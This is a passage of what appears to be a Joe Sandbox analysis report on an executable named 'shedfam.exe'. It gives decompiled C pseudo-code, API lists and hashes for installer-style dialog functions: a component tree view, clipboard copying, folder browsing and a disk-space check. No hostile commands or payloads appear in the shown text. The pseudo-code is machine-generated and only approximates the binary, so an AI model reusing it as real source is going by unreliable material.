TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053FB
SendMessageA.USER32 ref: 00405436
OpenClipboard.USER32(00000000), ref: 00405446
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040544C
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405455
GlobalLock.KERNEL32 ref: 0040545F
SendMessageA.USER32 ref: 00405473
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040548B
SetClipboardData.USER32 ref: 00405496
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040549C

Strings

{, xrefs: 0040538B

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
Instruction ID: e424ca0b0cb309e3be77902d9308c86312c6ad68702b37108e1cfd0bc7beca4c
Opcode Fuzzy Hash: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
Instruction Fuzzy Hash: 3FA13AB0900209BFDB11AFA1DD89AAE7F79FB44355F00803AFA05BA1E0C7795A41DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00404936 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00404936(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423f90 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423f99 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004048B6(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423f98) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42055c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420574;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42055c = _t315;
								 *0x420574 = _t315;
								 *0x423fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423f99 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420574;
									_t196 =  *0x423fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42375c + 0x10)) != _t315) {
											E00404871(0x3ff, 0xfffffffb, E00404889(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420574);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420574 = GlobalAlloc(0x40,  *0x423fac << 2);
					_t250 = LoadBitmapA( *0x423f80, 0x6e);
					 *0x420568 =  *0x420568 | 0xffffffff;
					_v24 = _t250;
					 *0x420570 = SetWindowLongA(_v8, 0xfffffffc, E00404F37);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42055c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42055c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405D1D(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403FB7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403FB7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420574 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420574 + _t318 * 4) = _t274;
									_t288 =  *( *0x420574 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403FEC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403FEC(_v12);
								L89:
								return E0040401E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404954
0x0040495a
0x0040495c
0x00404962
0x00404968
0x00404975
0x0040497e
0x00404981
0x00404984
0x00404bac
0x00404bb3
0x00404bc7
0x00404bb5
0x00404bb7
0x00404bba
0x00404bbb
0x00404bc2
0x00404bc2
0x00404bd3
0x00404be1
0x00404be4
0x00404bfa
0x00404c72
0x00404c75
0x00404c77
0x00404c81
0x00404c8f
0x00404c8f
0x00404c91
0x00404c9b
0x00404ca1
0x00404cc2
0x00404ca3
0x00404cb0
0x00404cb0
0x00404ca1
0x00404c9b
0x00000000
0x00404c75
0x00404bff
0x00404c0a
0x00404c0f
0x00404c16
0x00404c1d
0x00404c27
0x00404c27
0x00404c2b
0x00404c30
0x00404c35
0x00404c4b
0x00404c37
0x00404c37
0x00404c3f
0x00404c46
0x00404c41
0x00404c41
0x00404c41
0x00404c3f
0x00404c4f
0x00404c51
0x00404c5f
0x00404c60
0x00404c6c
0x00404c6f
0x00404c6f
0x00404c30
0x00000000
0x00404c1d
0x00404c01
0x00404c08
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cc5
0x00404cc5
0x00404ccc
0x00404d40
0x00404d47
0x00404d53
0x00404d53
0x00404d5c
0x00404d5e
0x00404d65
0x00404d68
0x00404d68
0x00404d6e
0x00404d75
0x00404d78
0x00404d78
0x00404d7e
0x00404d84
0x00404d8a
0x00404d8a
0x00404d97
0x00404ee4
0x00404eeb
0x00404f08
0x00404f0e
0x00404f20
0x00404f20
0x00000000
0x00404d9d
0x00404d9f
0x00404da7
0x00404dab
0x00404dab
0x00404db3
0x00404df4
0x00404df6
0x00404e06
0x00404e09
0x00404e0e
0x00404e15
0x00404e18
0x00404eba
0x00404ec0
0x00404ece
0x00404edf
0x00404edf
0x00000000
0x00404ece
0x00404e1e
0x00404e21
0x00404e27
0x00404e2c
0x00404e2e
0x00404e30
0x00404e36
0x00404e3d
0x00404e42
0x00404e49
0x00404e4c
0x00404e4c
0x00404e53
0x00404e5f
0x00404e63
0x00404e65
0x00404e65
0x00404e55
0x00404e57
0x00404e57
0x00404e85
0x00404e91
0x00404ea0
0x00404ea0
0x00404ea2
0x00404ea5
0x00404eae
0x00000000
0x00404db5
0x00404dc0
0x00404dc3
0x00404dc8
0x00404dca
0x00404dce
0x00404dde
0x00404de8
0x00404dea
0x00404ded
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dd0
0x00404dd0
0x00404dd6
0x00404dd8
0x00404dd8
0x00404dd9
0x00404dda
0x00000000
0x00404dd0
0x00404db3
0x00404d97
0x00404cd4
0x00000000
0x00404cea
0x00404cf4
0x00404cf9
0x00000000
0x00000000
0x00404d0b
0x00404d10
0x00404d1c
0x00404d1c
0x00404d1e
0x00404d2d
0x00404d2f
0x00404d36
0x00404d39
0x00000000
0x00404d39
0x00404cd4
0x0040498a
0x0040498f
0x00404999
0x0040499a
0x004049a3
0x004049ae
0x004049b9
0x004049bf
0x004049cd
0x004049e2
0x004049e7
0x004049f2
0x004049fb
0x00404a10
0x00404a21
0x00404a2e
0x00404a2e
0x00404a33
0x00404a39
0x00404a3b
0x00404a3e
0x00404a43
0x00404a48
0x00404a4a
0x00404a4a
0x00404a6a
0x00404a6a
0x00404a6c
0x00404a6d
0x00404a72
0x00404a75
0x00404a78
0x00404a7c
0x00404a81
0x00404a86
0x00404a8a
0x00404a8f
0x00404a94
0x00404a96
0x00404a9e
0x00404b68
0x00404b7b
0x00000000
0x00404aa4
0x00404aa7
0x00404aaa
0x00404aad
0x00404aad
0x00404ab3
0x00404ab9
0x00404abc
0x00404ac2
0x00404ac3
0x00404ac8
0x00404ad1
0x00404ad8
0x00404adb
0x00404ade
0x00404ae1
0x00404b1d
0x00404b46
0x00404b1f
0x00404b2c
0x00404b2c
0x00404ae3
0x00404ae6
0x00404af5
0x00404aff
0x00404b07
0x00404b0e
0x00404b16
0x00404b16
0x00404ae1
0x00404b4c
0x00404b4d
0x00404b59
0x00404b59
0x00404b66
0x00404b81
0x00404b85
0x00404ba2
0x00404ba7
0x00404baa
0x00000000
0x00404b87
0x00404b8c
0x00404b95
0x00404f22
0x00404f34
0x00404f34
0x00404b85
0x00000000
0x00404b66
0x00404a9e

APIs

GetDlgItem.USER32 ref: 0040494D
GetDlgItem.USER32 ref: 0040495A
GlobalAlloc.KERNEL32(00000040,?), ref: 004049A6
LoadBitmapA.USER32 ref: 004049B9
SetWindowLongA.USER32 ref: 004049D3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E7
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004049FB
SendMessageA.USER32 ref: 00404A10
SendMessageA.USER32 ref: 00404A1C
SendMessageA.USER32 ref: 00404A2E
DeleteObject.GDI32(?), ref: 00404A33
SendMessageA.USER32 ref: 00404A5E
SendMessageA.USER32 ref: 00404A6A
SendMessageA.USER32 ref: 00404AFF
SendMessageA.USER32 ref: 00404B2A
SendMessageA.USER32 ref: 00404B3E
GetWindowLongA.USER32 ref: 00404B6D
SetWindowLongA.USER32 ref: 00404B7B
ShowWindow.USER32(?,00000005), ref: 00404B8C
SendMessageA.USER32 ref: 00404C8F
SendMessageA.USER32 ref: 00404CF4
SendMessageA.USER32 ref: 00404D09
SendMessageA.USER32 ref: 00404D2D
SendMessageA.USER32 ref: 00404D53
ImageList_Destroy.COMCTL32(?), ref: 00404D68
GlobalFree.KERNEL32 ref: 00404D78
SendMessageA.USER32 ref: 00404DE8
SendMessageA.USER32 ref: 00404E91
SendMessageA.USER32 ref: 00404EA0
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EC0
ShowWindow.USER32(?,00000000), ref: 00404F0E
GetDlgItem.USER32 ref: 00404F19
ShowWindow.USER32(00000000), ref: 00404F20

Strings

N, xrefs: 00404BCA
, xrefs: 00404EF8
M, xrefs: 00404AE6

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
Instruction ID: 18330f5bf3a72d7674edbcfa030aeaae95a9b0ee0e7fe2e829f5852d3ce9e096
Opcode Fuzzy Hash: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
Instruction Fuzzy Hash: AE029DB0E00209AFDB21CF55DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004043F5 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004043F5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd50;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004055A0(0x3fb, _t146);
					E00405F5D(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004055A0(0x3fb, _t146);
							if(E004058CF(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405CFB(0x41f548, _t146);
							_t87 = E00406087(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405CFB(0x41f548, _t146);
								_t89 = E00405882(0x41f548);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f548,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f548) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f548,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405835(0x41f548) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f548) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404889(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42375c + 0x10)) != _t158) {
									E00404871(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f538);
									} else {
										E004047AC(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x424024 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403FD9(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42056c == _t158) {
									E0040438A();
								}
								 *0x42056c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420580;
							_v60 = E00404746;
							_v56 = _t146;
							_v68 = E00405D1D(_t146, 0x420580, _t166, 0x41f950, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004057EE(_t146);
								_t125 =  *((intOrPtr*)( *0x423f90 + 0x11c));
								if( *((intOrPtr*)( *0x423f90 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00405D1D(_t146, 0x420580, _t166, 0, _t125);
									if(lstrcmpiA(0x422f20, 0x420580) != 0) {
										lstrcatA(_t146, 0x422f20);
									}
								}
								 *0x42056c =  *0x42056c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040585B(_t146) != 0 && E00405882(_t146) == 0) {
						E004057EE(_t146);
					}
					 *0x423758 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403FB7(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403FB7(_t166);
					E00403FEC(_t165);
					_t138 = E00406087(0xa);
					if(_t138 == 0) {
						L53:
						return E0040401E(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x004043f5
0x004043fb
0x00404401
0x0040440e
0x0040441c
0x0040441f
0x00404427
0x0040442d
0x0040442d
0x00404439
0x0040443c
0x004044aa
0x004044b1
0x00404588
0x0040458f
0x0040459e
0x0040459e
0x004045a2
0x004045ac
0x004045b9
0x004045bb
0x004045bb
0x004045c9
0x004045d0
0x004045d7
0x004045da
0x00404611
0x00404613
0x00404619
0x0040461e
0x00404622
0x00404624
0x00404624
0x00404640
0x00000000
0x00404642
0x00404645
0x00404653
0x00404659
0x0040465a
0x0040465d
0x00404660
0x00000000
0x00404660
0x004045dc
0x004045de
0x004045e2
0x00000000
0x00000000
0x00000000
0x00000000
0x004045e4
0x004045e4
0x004045f1
0x004045f6
0x00000000
0x00000000
0x004045fa
0x004045fc
0x004045fc
0x00404607
0x0040460a
0x0040460f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040460f
0x0040466c
0x00404676
0x00404679
0x0040467c
0x00404683
0x00404683
0x00404685
0x00404685
0x0040468a
0x0040468c
0x00404694
0x0040469b
0x0040469d
0x004046a8
0x004046a8
0x0040469d
0x004046b8
0x004046c2
0x004046ca
0x004046e5
0x004046cc
0x004046d5
0x004046d5
0x004046ca
0x004046ea
0x004046ef
0x004046f4
0x004046fd
0x004046fd
0x00404706
0x00404708
0x00404708
0x00404714
0x0040471c
0x00404726
0x00404726
0x0040472b
0x00000000
0x0040472b
0x004045da
0x00404591
0x00404598
0x00000000
0x00000000
0x00000000
0x00404598
0x004044b7
0x004044c0
0x004044da
0x004044df
0x004044e9
0x004044f0
0x004044fc
0x004044ff
0x00404502
0x00404509
0x00404511
0x00404514
0x00404518
0x0040451f
0x00404527
0x00404581
0x00404529
0x0040452a
0x00404531
0x0040453b
0x00404543
0x00404550
0x00404564
0x00404568
0x00404568
0x00404564
0x0040456d
0x0040457a
0x0040457a
0x00404527
0x00000000
0x004044df
0x004044cd
0x00000000
0x00000000
0x004044d3
0x00000000
0x0040443e
0x0040444b
0x00404454
0x00404461
0x00404461
0x00404468
0x0040446e
0x00404477
0x0040447a
0x0040447d
0x00404485
0x00404488
0x0040448b
0x00404491
0x00404498
0x0040449f
0x00404731
0x00404743
0x004044a5
0x004044a8
0x00000000
0x004044a8
0x0040449f

APIs

GetDlgItem.USER32 ref: 00404444
SetWindowTextA.USER32(00000000,?), ref: 0040446E
SHBrowseForFolderA.SHELL32(?,0041F950,?), ref: 0040451F
CoTaskMemFree.OLE32(00000000), ref: 0040452A
lstrcmpiA.KERNEL32(00422F20,00420580,00000000,?,?), ref: 0040455C
lstrcatA.KERNEL32(?,00422F20), ref: 00404568
SetDlgItemTextA.USER32 ref: 0040457A

Part of subcall function 004055A0: GetDlgItemTextA.USER32 ref: 004055B3

Part of subcall function 00405F5D: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\shedfam.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
Part of subcall function 00405F5D: CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
Part of subcall function 00405F5D: CharNextA.USER32(?,"C:\Users\user\Desktop\shedfam.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
Part of subcall function 00405F5D: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7

GetDiskFreeSpaceA.KERNEL32(0041F548,?,?,0000040F,?,0041F548,0041F548,?,00000001,0041F548,?,?,000003FB,?), ref: 00404638
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404653

Part of subcall function 004047AC: lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
Part of subcall function 004047AC: wsprintfA.USER32 ref: 00404852
Part of subcall function 004047AC: SetDlgItemTextA.USER32 ref: 00404865

Strings

A, xrefs: 00404518
C:\Users\user\AppData\Local\Temp, xrefs: 00404545
/B, xrefs: 00404556

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
